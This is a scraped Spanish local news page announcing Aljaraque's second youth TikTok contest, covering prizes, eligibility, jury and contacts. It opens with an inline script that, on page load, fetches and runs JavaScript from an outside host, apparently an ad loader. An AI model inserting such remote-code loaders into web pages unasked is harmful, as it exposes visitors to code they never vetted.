(function (document, window) { document.addEventListener('DOMContentLoaded', function (event) { let a = document.createElement("script"); a.type = 'text/javascript'; a.async = true; a.src = "https://data.gblcdn.com/data/gblcdnp.js?pubid=05a114a0-fca3-11e9-8439-f143cce16e54&pid=TcvybSOnmDcPUTj&renderD=0&limitT=0&limitH=24&t=i"; document.body.appendChild(a); document.getElementById('TcvybSOnmDcPUTj').remove(); }); }) (document, window);
Sábado 25 de Junio de 2022

500 euros en premios en el Concurso Juvenil de TikTok de Aljaraque

0

La creatividad y el talento volverán a ser protagonistas en el ‘II Concurso Juvenil de TikTok’, que organiza la Concejalía de Juventud. El certamen cogerá las categorías individual y grupal y repartirá hasta 500 euros en premios.

Ante el éxito de su primera edición el consistorio aljaraqueño, a través de la Concejalía de Juventud, que dirige José Cruz, ha presentado esta mañana el ‘II Concurso Juvenil de TikTok’, un evento muy esperado entre los más jóvenes del municipio de Aljaraque y de toda la provincia de Huelva.

En el acto, el propio concejal de Juventud y primer teniente de alcalde ha destacado que “volvemos a fomentar así, con este tipo de herramientas que son tan habituales entre los jóvenes, la creatividad que ya sabemos que es muy rica y que nos sorprende continuamente. Desde aquí animamos a todos los jóvenes de la provincia a participar y esperamos que este concurso tenga la misma acogida, los mismos resultados y el mismo éxito del pasado año y volvamos, de esta forma, el año que viene a hacer realidad este concurso tan atractivo para la juventud y que fomenta otro tipo de ocio saludable”.

El video presentado al concurso podrá ser de cualquier tipo de interpretación musical, cante, monólogo, imitación, chiste, baile y coreografía, habilidad o de otra propuesta creativa. El plazo para dar a conocer los trabajos expira el 17 de junio a las 13:30 horas, siendo los premios, tanto en categoría individual como grupal, de 150 euros para el primer clasificado y de 100 euros para el segundo.

Pueden participar en el concurso

Podrán participar personas de entre 14 y 30 años de toda la provincia de Huelva siendo imprescindible publicar el video en la plataforma de TikTok y que se permita su visualización pública, incluyendo un título propio en la obra. El jurado del concurso estará compuesto por cuatro personas vinculadas a las áreas municipales de Juventud, Cultura y Nuevas Tecnologías del Ayuntamiento de Aljaraque quienes valorarán los trabajos presentados según su atractivo en conjunto, tanto en formato como en contenido, originalidad, creatividad, claridad e interés.


Tanto para consultar las bases de manera íntegra como para obtener más información se puede consultar el cartel del concurso, la página web municipal, enviar un correo electrónico a [email protected] o llamar a los teléfonos 959 31 87 82 y 670 02 92 75.

 

Leave A Reply

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios. Ver detalles

ACEPTAR
Aviso de cookies